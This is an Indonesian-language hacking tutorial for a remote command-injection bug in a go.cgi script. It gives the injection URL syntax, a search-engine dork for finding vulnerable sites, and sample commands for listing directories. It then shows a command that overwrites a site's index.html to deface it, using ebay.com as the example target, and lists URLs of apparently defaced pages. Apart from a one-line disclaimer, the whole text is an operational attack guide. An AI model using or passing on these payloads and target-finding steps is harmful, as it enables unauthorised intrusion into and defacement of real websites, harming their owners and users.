..::go BUG::..

 
Affects: Websites running ?go
Compromised: WWW account (escalation to root/admin possible)
Description: 

Ini adalah sebuah bug yang ditemukan pada file go.cgi. Eksekusi remote pada web brosermu. Syntagnya adalah sebagai berikut:
 
       http://[VICTIM]/[CGI_DIRECTORY]/go.cgi?go=|[COMMAND]|
       Note: CGI_DIRECTORY adalah cgi-bin or cgi-local (tergantung pada bug, dan server)
 
Cari target di seach engine misal google dengan keyword 'allinurl:go.cgi?go=' ini akan list semua websites yang menggunakan go.cgi. Kemudian jalankan dengan perintah seperti dibawah :
 
       http://[VICTIM]/[CGI_DIRECTORY]/go.cgi?go=|ls|
 
Seperti pada sebuah linux box, ls akan mendaftar/list isi directory, tau dengan tag yang lain sepert di bawah ini:
 
       http://[VICTIM]/[CGI_DIRECTORY]/go.cgi?go=|ls /|
                         atau
       http://[VICTIM]/[CGI_DIRECTORY]/go.cgi?go=|ls+/|
 
Oke kita coba dengan target sebagai berikut (xixixi contoh!!!)
 
1. http://ebay.com/cgi-bin/go.cgi?go=|ls /home/ebay|
2. http://ebay.com/cgi-bin/go.cgi?go=|ls /home/ebay/public_html|
 
Nah tu kan ada indexna,....xixixi :=)
Selanjutnya :
       
       http://ebay.com/cgi-bin/go.cgi?go=|echo+jiancuk by kamesywara+>+ /home/ebay/public_html/index.html|

Contoh :
http://maxis-ville.hypermart.net/cgi-bin/Croded.html
http://www.planodenegocio.com.br/scripts/Croded.html

PERINGATAN :
ini adalah sebuah ilmu pengetahuan. Jangan dibuat mainan. OKe
Jayalah IT (Information Technology) Indonesia
Vivat!!